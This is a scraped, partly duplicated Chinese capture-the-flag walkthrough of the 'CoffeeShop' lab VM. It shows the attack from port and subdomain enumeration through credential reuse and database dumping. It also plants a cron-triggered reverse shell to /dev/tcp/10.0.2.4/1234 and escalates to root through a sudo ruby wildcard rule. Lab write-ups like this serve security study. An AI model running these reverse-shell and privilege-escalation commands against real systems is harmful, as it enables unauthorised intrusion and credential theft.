![\"image-20240401123115997\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404011325634.png\")
<\/div><\/p>\n\u626b\u63cf\u4e00\u4e0b\uff1a<\/p>\n
![\"image-20240401123319738\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404011325636.png\")
<\/div><\/p>\n\u4fe1\u606f\u641c\u96c6<\/h2>\n\u7aef\u53e3\u626b\u63cf<\/h3>\nsudo nmap -sS -p 1-65535 10.0.2.15\nStarting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-04-01 00:34 EDT\nNmap scan report for 10.0.2.15\nHost is up (0.000079s latency).\nNot shown: 65533 closed tcp ports (reset)\nPORT STATE SERVICE\n22\/tcp open ssh\n80\/tcp open http\nMAC Address: 08:00:27:2A:FE:97 (Oracle VirtualBox virtual NIC)<\/code><\/pre>\n\u76ee\u5f55\u626b\u63cf<\/h3>\n
\u5f00\u542f\u4e8680\u7aef\u53e3\uff0c\u5c1d\u8bd5\u626b\u63cf\u76ee\u5f55\uff1a<\/p>\n
gobuster dir -u http:\/\/10.0.2.15\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,txt,html.png,jpg,zip<\/code><\/pre>\n\/.php (Status: 403) [Size: 274]\n\/.html.png (Status: 403) [Size: 274]\n\/shop (Status: 301) [Size: 305] [--> http:\/\/10.0.2.15\/shop\/]\n\/.html.png (Status: 403) [Size: 274]\n\/.php (Status: 403) [Size: 274]\n\/server-status (Status: 403) [Size: 274]<\/code><\/pre>\n\u4ee5\u9632\u4e07\u4e00\uff0c\u518d\u626b\u4e00\u4e0b\uff1a<\/p>\n
dirsearch -u http:\/\/10.0.2.15<\/code><\/pre>\n[00:38:32] 403 - 274B - \/.ht_wsr.txt\n[00:38:32] 403 - 274B - \/.htaccess.orig\n[00:38:32] 403 - 274B - \/.htaccess.sample\n[00:38:32] 403 - 274B - \/.htaccess_orig\n[00:38:32] 403 - 274B - \/.htaccess_extra\n[00:38:32] 403 - 274B - \/.htaccess_sc\n[00:38:32] 403 - 274B - \/.htaccess.save\n[00:38:32] 403 - 274B - \/.htaccessOLD2\n[00:38:32] 403 - 274B - \/.htaccessOLD\n[00:38:32] 403 - 274B - \/.htm\n[00:38:32] 403 - 274B - \/.htaccess.bak1\n[00:38:32] 403 - 274B - \/.htaccessBAK\n[00:38:32] 403 - 274B - \/.html\n[00:38:32] 403 - 274B - \/.htpasswds\n[00:38:32] 403 - 274B - \/.htpasswd_test\n[00:38:32] 403 - 274B - \/.httr-oauth\n[00:38:33] 403 - 274B - \/.php\n[00:38:57] 403 - 274B - \/server-status\n[00:38:57] 403 - 274B - \/server-status\/\n[00:38:58] 301 - 305B - \/shop -> http:\/\/10.0.2.15\/shop\/<\/code><\/pre>\n\u6f0f\u6d1e\u6316\u6398<\/h2>\n\u52d8\u5bdf\u4e00\u4e0b<\/h3>\n
![\"image-20240401124015785\"](\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\")
<\/div><\/p>\n\u6e90\u7801\u91cc\u4e5f\u6ca1\u5565\uff0c\u63d2\u4ef6\u663e\u793a\u4e86\u4e00\u4e9b\u914d\u7f6e\u4fe1\u606f\uff1a<\/p>\n
<\/div><\/p>\n\u67e5\u770b\u654f\u611f\u76ee\u5f55<\/h3>\n
<\/div><\/p>\n\u6709\u767b\u5f55\u7684\u5730\u65b9\uff0c\u5c1d\u8bd5\u4e00\u4e0b\uff1a<\/p>\n
<\/div><\/p>\n\u5f31\u53e3\u4ee4\u3001\u4e07\u80fd\u5bc6\u7801\uff0c\u4f46\u662f\u65e0\u679c\uff0c\u518d\u7ffb\u7ffb\uff1a<\/p>\n
\u5c1d\u8bd5\u5c06host\u6dfb\u52a0\u8fdb\u53bb\uff0c\u770b\u770b\u80fd\u4e0d\u80fd\u8bbf\u95ee\u5230\uff1a<\/p>\n
echo '10.0.2.15 midnight.coffee' >> \/etc\/hosts<\/code><\/pre>\n<\/div><\/p>\nok\u3002<\/p>\n
\u67e5\u770b\u4e00\u4e0b\u4e4b\u524d\u770b\u5230\u7684\u654f\u611f\u6587\u4ef6\uff1a<\/p>\n
\/.htpasswds\n\/.htpasswd_test\nYou don't have permission to access this resource.<\/code><\/pre>\n\u5c1d\u8bd5FUZZ\u4e00\u4e0b\uff1a<\/p>\n
wfuzz -w \/usr\/share\/seclists\/Discovery\/DNS\/subdomains-top1million-110000.txt -u midnight.coffee -H "Host: FUZZ.midnight.coffee" --hh 1690 2>\/dev\/null<\/code><\/pre>\n<\/div><\/p>\n\u5c1d\u8bd5\u6dfb\u52a0dns\u8bbf\u95ee\uff1a<\/p>\n
10.0.2.15 midnight.coffee dev.midnight.coffee<\/code><\/pre>\n<\/div><\/p>\n\u7ed9\u51fa\u4e86\u8d26\u53f7\u5bc6\u7801\uff0c\u5c1d\u8bd5\u767b\u5f55\uff1a<\/p>\n
developer\ndeveloper<\/code><\/pre>\n<\/div><\/p>\ntuna : 1L0v3_TuN4_Very_Much<\/code><\/pre>\nssh\u8fde\u63a5<\/h3>\n
<\/div><\/p>\n\u63d0\u6743<\/h2>\n\u4fe1\u606f\u641c\u96c6<\/h3>\ntuna@coffee-shop:~$ sudo -l\n[sudo] password for tuna: \nSorry, user tuna may not run sudo on coffee-shop.\ntuna@coffee-shop:~$ cat \/etc\/passwd\nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/run\/ircd:\/usr\/sbin\/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\n_apt:x:100:65534::\/nonexistent:\/usr\/sbin\/nologin\nsystemd-network:x:101:102:systemd Network Management,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-resolve:x:102:103:systemd Resolver,,,:\/run\/systemd:\/usr\/sbin\/nologin\nmessagebus:x:103:104::\/nonexistent:\/usr\/sbin\/nologin\nsystemd-timesync:x:104:105:systemd Time Synchronization,,,:\/run\/systemd:\/usr\/sbin\/nologin\npollinate:x:105:1::\/var\/cache\/pollinate:\/bin\/false\nsshd:x:106:65534::\/run\/sshd:\/usr\/sbin\/nologin\nsyslog:x:107:113::\/home\/syslog:\/usr\/sbin\/nologin\nuuidd:x:108:114::\/run\/uuidd:\/usr\/sbin\/nologin\ntcpdump:x:109:115::\/nonexistent:\/usr\/sbin\/nologin\ntss:x:110:116:TPM software stack,,,:\/var\/lib\/tpm:\/bin\/false\nlandscape:x:111:117::\/var\/lib\/landscape:\/usr\/sbin\/nologin\nfwupd-refresh:x:112:118:fwupd-refresh user,,,:\/run\/systemd:\/usr\/sbin\/nologin\nusbmux:x:113:46:usbmux daemon,,,:\/var\/lib\/usbmux:\/usr\/sbin\/nologin\nmrmidnight:x:1000:1000:mrmidnight:\/home\/mrmidnight:\/bin\/bash\nlxd:x:999:100::\/var\/snap\/lxd\/common\/lxd:\/bin\/false\nshopadmin:x:1001:1001:,,,:\/home\/shopadmin:\/bin\/bash\nmysql:x:114:120:MySQL Server,,,:\/nonexistent:\/bin\/false\ntuna:x:1002:1002:,,,:\/home\/tuna:\/bin\/bash\ntuna@coffee-shop:~$ cat \/etc\/cron*\ncat: \/etc\/cron.d: Is a directory\ncat: \/etc\/cron.daily: Is a directory\ncat: \/etc\/cron.hourly: Is a directory\ncat: \/etc\/cron.monthly: Is a directory\n# \/etc\/crontab: system-wide crontab\n# Unlike any other crontab you don't have to run the `crontab'\n# command to install the new version when you edit this file\n# and files in \/etc\/cron.d. These files also have username fields,\n# that none of the other crontabs do.\n\nSHELL=\/bin\/sh\n# You can also override PATH, but by default, newer versions inherit it from the environment\n#PATH=\/usr\/local\/sbin:\/usr\/local\/bin:\/sbin:\/bin:\/usr\/sbin:\/usr\/bin\n\n# Example of job definition:\n# .---------------- minute (0 - 59)\n# | .------------- hour (0 - 23)\n# | | .---------- day of month (1 - 31)\n# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...\n# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat\n# | | | | |\n# * * * * * user-name command to be executed\n17 * * * * root cd \/ && run-parts --report \/etc\/cron.hourly\n25 6 * * * root test -x \/usr\/sbin\/anacron || ( cd \/ && run-parts --report \/etc\/cron.daily )\n47 6 * * 7 root test -x \/usr\/sbin\/anacron || ( cd \/ && run-parts --report \/etc\/cron.weekly )\n52 6 1 * * root test -x \/usr\/sbin\/anacron || ( cd \/ && run-parts --report \/etc\/cron.monthly )\n#\n* * * * * \/bin\/bash \/home\/shopadmin\/execute.sh\n\ncat: \/etc\/cron.weekly: Is a directory\ntuna@coffee-shop:~$ find \/ -perm -u=s -type f 2>\/dev\/null\n\/snap\/snapd\/21184\/usr\/lib\/snapd\/snap-confine\n\/snap\/snapd\/20290\/usr\/lib\/snapd\/snap-confine\n\/snap\/core20\/1974\/usr\/bin\/chfn\n\/snap\/core20\/1974\/usr\/bin\/chsh\n\/snap\/core20\/1974\/usr\/bin\/gpasswd\n\/snap\/core20\/1974\/usr\/bin\/mount\n\/snap\/core20\/1974\/usr\/bin\/newgrp\n\/snap\/core20\/1974\/usr\/bin\/passwd\n\/snap\/core20\/1974\/usr\/bin\/su\n\/snap\/core20\/1974\/usr\/bin\/sudo\n\/snap\/core20\/1974\/usr\/bin\/umount\n\/snap\/core20\/1974\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/snap\/core20\/1974\/usr\/lib\/openssh\/ssh-keysign\n\/snap\/core20\/2105\/usr\/bin\/chfn\n\/snap\/core20\/2105\/usr\/bin\/chsh\n\/snap\/core20\/2105\/usr\/bin\/gpasswd\n\/snap\/core20\/2105\/usr\/bin\/mount\n\/snap\/core20\/2105\/usr\/bin\/newgrp\n\/snap\/core20\/2105\/usr\/bin\/passwd\n\/snap\/core20\/2105\/usr\/bin\/su\n\/snap\/core20\/2105\/usr\/bin\/sudo\n\/snap\/core20\/2105\/usr\/bin\/umount\n\/snap\/core20\/2105\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/snap\/core20\/2105\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/snapd\/snap-confine\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/bin\/gpasswd\n\/usr\/bin\/su\n\/usr\/bin\/chfn\n\/usr\/bin\/newgrp\n\/usr\/bin\/sudo\n\/usr\/bin\/chsh\n\/usr\/bin\/passwd\n\/usr\/bin\/umount\n\/usr\/bin\/pkexec\n\/usr\/bin\/fusermount3\n\/usr\/bin\/mount\n\/usr\/libexec\/polkit-agent-helper-1\ntuna@coffee-shop:~$ echo $PATH\n\/usr\/local\/sbin:\/usr\/local\/bin:\/usr\/sbin:\/usr\/bin:\/sbin:\/bin:\/usr\/games:\/usr\/local\/games:\/snap\/bin\ntuna@coffee-shop:~$ pwd\n\/home\/tuna\ntuna@coffee-shop:~$ ls -la\ntotal 40\ndrwxr-x--- 3 tuna tuna 4096 Jan 3 18:49 .\ndrwxr-xr-x 5 root root 4096 Jan 3 17:12 ..\n-rw------- 1 tuna tuna 839 Jan 3 18:40 .bash_history\n-rw-r--r-- 1 tuna tuna 220 Jan 3 17:12 .bash_logout\n-rw-r--r-- 1 tuna tuna 3771 Jan 3 17:12 .bashrc\ndrwx------ 2 tuna tuna 4096 Jan 3 18:49 .cache\n-rw-r--r-- 1 tuna tuna 807 Jan 3 17:12 .profile\n-rw------- 1 tuna tuna 8410 Jan 3 18:28 .viminfo\ntuna@coffee-shop:~$ head .bash_history \nls\ntouch coffee_list.txt\nvim coffee_list.txt \nhead coffee_list.txt \nvim coffee_list.txt \nmv coffee_list.txt unavailable.txt\nls\nhead unavailable.txt \ntail unavailable.txt \nmv unavailable.txt available.txt\ntuna@coffee-shop:~$ tail .bash_history \nls\ncat \/home\/shopadmin\/\ncat \/home\/shopadmin\/execute.sh\nexit\ncat \/home\/shopadmin\/execute.sh\nexit\ncat \/home\/shopadmin\/execute.sh\ncd\nls\nexit\ntuna@coffee-shop:~$ cd \/var\/www\/html\ntuna@coffee-shop:\/var\/www\/html$ ls -la\ntotal 20\ndrwxr-xr-x 4 root root 4096 Jan 3 16:51 .\ndrwxr-xr-x 3 root root 4096 Jan 3 14:10 ..\n-rw-r--r-- 1 root root 1690 Jan 3 16:51 index.html\ndrwxr-xr-x 3 root root 4096 Jan 3 18:49 shop\ndrwxr-xr-x 3 root root 4096 Jan 3 16:34 subdomaindeveloperdirectoryuwu\ntuna@coffee-shop:\/var\/www\/html$ cd shop\ntuna@coffee-shop:\/var\/www\/html\/shop$ ls -la\ntotal 24\ndrwxr-xr-x 3 root root 4096 Jan 3 18:49 .\ndrwxr-xr-x 4 root root 4096 Jan 3 16:51 ..\n-rw-r--r-- 1 root root 1754 Jan 3 18:49 dashboard.php\n-rw-r--r-- 1 root root 2577 Jan 3 16:47 index.html\n-rw-r--r-- 1 root root 2970 Jan 3 17:02 login.php\ndrwxr-xr-x 2 root root 4096 Jan 3 16:46 stylesheet\ntuna@coffee-shop:\/var\/www\/html\/shop$ cat login.php\n<?php\nini_set('display_errors', 1);\nini_set('display_startup_errors', 1);\nerror_reporting(E_ALL);\n\nsession_start();\n\n$host = 'localhost';\n$username = 'shopadmin';\n$password = '1_4m_4dmin';\n$database = 'midnightcoffee';<\/code><\/pre>\nmysql\u4fe1\u606f\u641c\u96c6<\/h3>\n
\u5c1d\u8bd5\u5207\u6362\u7528\u6237<\/p>\n
su shopadmin\n1_4m_4dmin\n# su: Authentication failure<\/code><\/pre>\nmysql\u770b\u4e00\u4e0b\u76f8\u5173\u4fe1\u606f\uff1a<\/p>\n
mysql -u shopadmin -p<\/code><\/pre>\nmysql> show databases;\n+--------------------+\n| Database |\n+--------------------+\n| information_schema |\n| midnightcoffee |\n| mysql |\n| performance_schema |\n| sys |\n+--------------------+\n5 rows in set (0.00 sec)\n\nmysql> use midnightcoffee;\nReading table information for completion of table and column names\nYou can turn off this feature to get a quicker startup with -A\n\nDatabase changed\nmysql> show tables;\n+--------------------------+\n| Tables_in_midnightcoffee |\n+--------------------------+\n| users |\n+--------------------------+\n1 row in set (0.00 sec)\n\nmysql> select * from users;\n+----+-----------+--------------------------------------------------------------+----------------------------------+\n| id | username | password | auth_token |\n+----+-----------+--------------------------------------------------------------+----------------------------------+\n| 1 | shopadmin | $2a$12$yqH60OJyTqoPHXe1g1cGDu93me1v.wGcEEZV5rLy39stUJO.Xsjwi | NULL |\n| 2 | tuna | 1L0v3_TuN4_Very_Much | NULL |\n| 3 | developer | developer | 5b290480bcbaec662aa8531cbc6da4fc |\n+----+-----------+--------------------------------------------------------------+----------------------------------+\n3 rows in set (0.00 sec)<\/code><\/pre>\n\u6211\u64e6\uff0c\u6ca1\u5565\u7528\u3002\u3002\u3002<\/p>\n
\u5b9a\u65f6\u4efb\u52a1+\u53cd\u5f39shell<\/h3>\n
\u5b9a\u65f6\u4efb\u52a1\u626b\u5230\u4e00\u4e2a\u5185\u5bb9\uff1a<\/p>\n
\/home\/shopadmin\/execute.sh<\/code><\/pre>\n\u67e5\u770b\u4e00\u4e0b\u76f8\u5173\u5185\u5bb9\uff1a<\/p>\n
#!\/bin\/bash\n\n\/bin\/bash \/tmp\/*.sh<\/code><\/pre>\n\u554a\uff0c\u8fd9\uff0c\u5728tmp<\/code>\u521b\u5efa\u4e00\u4e2a.sh<\/code>\u811a\u672c\uff0c\u811a\u672c\u5185\u5bb9\u662f\u5c1d\u8bd5\u53cd\u5f39\u4e00\u4e2ashell\uff1a<\/p>\n# tuna\ncd \/tmp;\necho "bash -c 'exec bash -i &>\/dev\/tcp\/10.0.2.4\/1234 <&1'" > exp.sh\n\n# kali\npwncat-cs -lp 1234<\/code><\/pre>\n<\/div><\/p>\n\u4fe1\u606f\u641c\u96c6<\/h3>\nsudo -l\nMatching Defaults entries for shopadmin on coffee-shop:\n env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin,\n use_pty\n\nUser shopadmin may run the following commands on coffee-shop:\n (root) NOPASSWD: \/usr\/bin\/ruby * \/opt\/shop.rb<\/code><\/pre>\n\u725b\u86d9\uff0cruby\u662froot\u6743\u9650\uff01<\/p>\n
\u67e5\u770b\u4e00\u4e0b\uff1a<\/p>\n
cat \/opt\/shop.rb\nputs "C0FF33 SHOPS R L33T"<\/code><\/pre>\n\u770b\u5230\u54ea\u4e2a*<\/code>\u4e86\u5417\uff0c\u8fd9\u8868\u660e\u53ef\u4ee5\u5728\u4e2d\u95f4\u6dfb\u52a0\u4efb\u610f\u5b57\u7b26\uff1a<\/p>\necho "system '\/bin\/bash'" > \/tmp\/fuck.rb\nsudo \/usr\/bin\/ruby \/tmp\/fuck.rb \/opt\/shop.rb<\/code><\/pre>\n\u7136\u540e\u5c31\u83b7\u5f97\u4e86root\uff01<\/p>\n
sudo \/usr\/bin\/ruby \/tmp\/fuck.rb \/opt\/shop.rb\nroot@coffee-shop:\/home\/shopadmin# whoami;id\nroot\nuid=0(root) gid=0(root) groups=0(root)\nroot@coffee-shop:\/home\/shopadmin# cd \/root;ls -la\ntotal 64\ndrwx------ 6 root root 4096 Feb 3 10:31 .\ndrwxr-xr-x 19 root root 4096 Jan 3 13:36 ..\n-rw------- 1 root root 4345 Feb 3 10:32 .bash_history\n-rw-r--r-- 1 root root 3106 Oct 15 2021 .bashrc\ndrwx------ 2 root root 4096 Jan 3 18:40 .cache\n-rw------- 1 root root 20 Jan 3 18:20 .lesshst\ndrwxr-xr-x 3 root root 4096 Jan 3 13:45 .local\n-rw------- 1 root root 1539 Jan 3 17:08 .mysql_history\n-rw-r--r-- 1 root root 161 Jul 9 2019 .profile\n-rw-r--r-- 1 root root 25 Feb 3 10:31 root.txt\ndrwx------ 3 root root 4096 Jan 3 13:37 snap\ndrwx------ 2 root root 4096 Jan 3 13:37 .ssh\n-rw-r--r-- 1 root root 0 Jan 3 14:12 .sudo_as_admin_successful\n-rw------- 1 root root 9874 Feb 3 10:31 .viminfo\nroot@coffee-shop:~# cat root.txt\nC4FF3331N-ADD1CCCTIONNNN\nroot@coffee-shop:~# cd \/home;ls\nmrmidnight shopadmin tuna\nroot@coffee-shop:\/home# cd tuna;ls\nroot@coffee-shop:\/home\/tuna# cd ..\nroot@coffee-shop:\/home# cd shopadmin\/;ls\nexecute.sh user.txt\nroot@coffee-shop:\/home\/shopadmin# cat user.txt\nDR1NK1NG-C0FF33-4T-N1GHT<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"CoffeeShop \u626b\u63cf\u4e00\u4e0b\uff1a \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf sudo nmap -sS -p 1-65535 10. […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-481","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/481","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=481"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/481\/revisions"}],"predecessor-version":[{"id":482,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/481\/revisions\/482"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=481"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=481"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=481"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
sudo nmap -sS -p 1-65535 10.0.2.15\nStarting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-04-01 00:34 EDT\nNmap scan report for 10.0.2.15\nHost is up (0.000079s latency).\nNot shown: 65533 closed tcp ports (reset)\nPORT STATE SERVICE\n22\/tcp open ssh\n80\/tcp open http\nMAC Address: 08:00:27:2A:FE:97 (Oracle VirtualBox virtual NIC)<\/code><\/pre>\n\u76ee\u5f55\u626b\u63cf<\/h3>\n
\u5f00\u542f\u4e8680\u7aef\u53e3\uff0c\u5c1d\u8bd5\u626b\u63cf\u76ee\u5f55\uff1a<\/p>\n
gobuster dir -u http:\/\/10.0.2.15\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,txt,html.png,jpg,zip<\/code><\/pre>\n\/.php (Status: 403) [Size: 274]\n\/.html.png (Status: 403) [Size: 274]\n\/shop (Status: 301) [Size: 305] [--> http:\/\/10.0.2.15\/shop\/]\n\/.html.png (Status: 403) [Size: 274]\n\/.php (Status: 403) [Size: 274]\n\/server-status (Status: 403) [Size: 274]<\/code><\/pre>\n\u4ee5\u9632\u4e07\u4e00\uff0c\u518d\u626b\u4e00\u4e0b\uff1a<\/p>\n
dirsearch -u http:\/\/10.0.2.15<\/code><\/pre>\n[00:38:32] 403 - 274B - \/.ht_wsr.txt\n[00:38:32] 403 - 274B - \/.htaccess.orig\n[00:38:32] 403 - 274B - \/.htaccess.sample\n[00:38:32] 403 - 274B - \/.htaccess_orig\n[00:38:32] 403 - 274B - \/.htaccess_extra\n[00:38:32] 403 - 274B - \/.htaccess_sc\n[00:38:32] 403 - 274B - \/.htaccess.save\n[00:38:32] 403 - 274B - \/.htaccessOLD2\n[00:38:32] 403 - 274B - \/.htaccessOLD\n[00:38:32] 403 - 274B - \/.htm\n[00:38:32] 403 - 274B - \/.htaccess.bak1\n[00:38:32] 403 - 274B - \/.htaccessBAK\n[00:38:32] 403 - 274B - \/.html\n[00:38:32] 403 - 274B - \/.htpasswds\n[00:38:32] 403 - 274B - \/.htpasswd_test\n[00:38:32] 403 - 274B - \/.httr-oauth\n[00:38:33] 403 - 274B - \/.php\n[00:38:57] 403 - 274B - \/server-status\n[00:38:57] 403 - 274B - \/server-status\/\n[00:38:58] 301 - 305B - \/shop -> http:\/\/10.0.2.15\/shop\/<\/code><\/pre>\n\u6f0f\u6d1e\u6316\u6398<\/h2>\n\u52d8\u5bdf\u4e00\u4e0b<\/h3>\n
<\/div><\/p>\n\u6e90\u7801\u91cc\u4e5f\u6ca1\u5565\uff0c\u63d2\u4ef6\u663e\u793a\u4e86\u4e00\u4e9b\u914d\u7f6e\u4fe1\u606f\uff1a<\/p>\n
<\/div><\/p>\n\u67e5\u770b\u654f\u611f\u76ee\u5f55<\/h3>\n
<\/div><\/p>\n\u6709\u767b\u5f55\u7684\u5730\u65b9\uff0c\u5c1d\u8bd5\u4e00\u4e0b\uff1a<\/p>\n
<\/div><\/p>\n\u5f31\u53e3\u4ee4\u3001\u4e07\u80fd\u5bc6\u7801\uff0c\u4f46\u662f\u65e0\u679c\uff0c\u518d\u7ffb\u7ffb\uff1a<\/p>\n
\u5c1d\u8bd5\u5c06host\u6dfb\u52a0\u8fdb\u53bb\uff0c\u770b\u770b\u80fd\u4e0d\u80fd\u8bbf\u95ee\u5230\uff1a<\/p>\n
echo '10.0.2.15 midnight.coffee' >> \/etc\/hosts<\/code><\/pre>\n<\/div><\/p>\nok\u3002<\/p>\n
\u67e5\u770b\u4e00\u4e0b\u4e4b\u524d\u770b\u5230\u7684\u654f\u611f\u6587\u4ef6\uff1a<\/p>\n
\/.htpasswds\n\/.htpasswd_test\nYou don't have permission to access this resource.<\/code><\/pre>\n\u5c1d\u8bd5FUZZ\u4e00\u4e0b\uff1a<\/p>\n
wfuzz -w \/usr\/share\/seclists\/Discovery\/DNS\/subdomains-top1million-110000.txt -u midnight.coffee -H "Host: FUZZ.midnight.coffee" --hh 1690 2>\/dev\/null<\/code><\/pre>\n<\/div><\/p>\n\u5c1d\u8bd5\u6dfb\u52a0dns\u8bbf\u95ee\uff1a<\/p>\n
10.0.2.15 midnight.coffee dev.midnight.coffee<\/code><\/pre>\n<\/div><\/p>\n\u7ed9\u51fa\u4e86\u8d26\u53f7\u5bc6\u7801\uff0c\u5c1d\u8bd5\u767b\u5f55\uff1a<\/p>\n
developer\ndeveloper<\/code><\/pre>\n<\/div><\/p>\ntuna : 1L0v3_TuN4_Very_Much<\/code><\/pre>\nssh\u8fde\u63a5<\/h3>\n
<\/div><\/p>\n\u63d0\u6743<\/h2>\n\u4fe1\u606f\u641c\u96c6<\/h3>\ntuna@coffee-shop:~$ sudo -l\n[sudo] password for tuna: \nSorry, user tuna may not run sudo on coffee-shop.\ntuna@coffee-shop:~$ cat \/etc\/passwd\nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/run\/ircd:\/usr\/sbin\/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\n_apt:x:100:65534::\/nonexistent:\/usr\/sbin\/nologin\nsystemd-network:x:101:102:systemd Network Management,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-resolve:x:102:103:systemd Resolver,,,:\/run\/systemd:\/usr\/sbin\/nologin\nmessagebus:x:103:104::\/nonexistent:\/usr\/sbin\/nologin\nsystemd-timesync:x:104:105:systemd Time Synchronization,,,:\/run\/systemd:\/usr\/sbin\/nologin\npollinate:x:105:1::\/var\/cache\/pollinate:\/bin\/false\nsshd:x:106:65534::\/run\/sshd:\/usr\/sbin\/nologin\nsyslog:x:107:113::\/home\/syslog:\/usr\/sbin\/nologin\nuuidd:x:108:114::\/run\/uuidd:\/usr\/sbin\/nologin\ntcpdump:x:109:115::\/nonexistent:\/usr\/sbin\/nologin\ntss:x:110:116:TPM software stack,,,:\/var\/lib\/tpm:\/bin\/false\nlandscape:x:111:117::\/var\/lib\/landscape:\/usr\/sbin\/nologin\nfwupd-refresh:x:112:118:fwupd-refresh user,,,:\/run\/systemd:\/usr\/sbin\/nologin\nusbmux:x:113:46:usbmux daemon,,,:\/var\/lib\/usbmux:\/usr\/sbin\/nologin\nmrmidnight:x:1000:1000:mrmidnight:\/home\/mrmidnight:\/bin\/bash\nlxd:x:999:100::\/var\/snap\/lxd\/common\/lxd:\/bin\/false\nshopadmin:x:1001:1001:,,,:\/home\/shopadmin:\/bin\/bash\nmysql:x:114:120:MySQL Server,,,:\/nonexistent:\/bin\/false\ntuna:x:1002:1002:,,,:\/home\/tuna:\/bin\/bash\ntuna@coffee-shop:~$ cat \/etc\/cron*\ncat: \/etc\/cron.d: Is a directory\ncat: \/etc\/cron.daily: Is a directory\ncat: 